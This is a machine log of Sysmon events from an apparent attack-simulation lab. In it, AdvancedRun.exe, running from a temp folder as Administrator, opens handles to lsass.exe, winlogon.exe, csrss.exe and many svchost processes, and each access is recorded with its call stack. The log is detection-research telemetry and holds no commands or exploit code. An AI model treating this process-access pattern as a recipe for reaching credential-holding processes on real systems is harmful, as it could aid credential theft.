20:14:45.059{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 734700x80000000000000004075294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.055{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004075292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.058{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.058{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.058{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075283Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075281Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004075280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 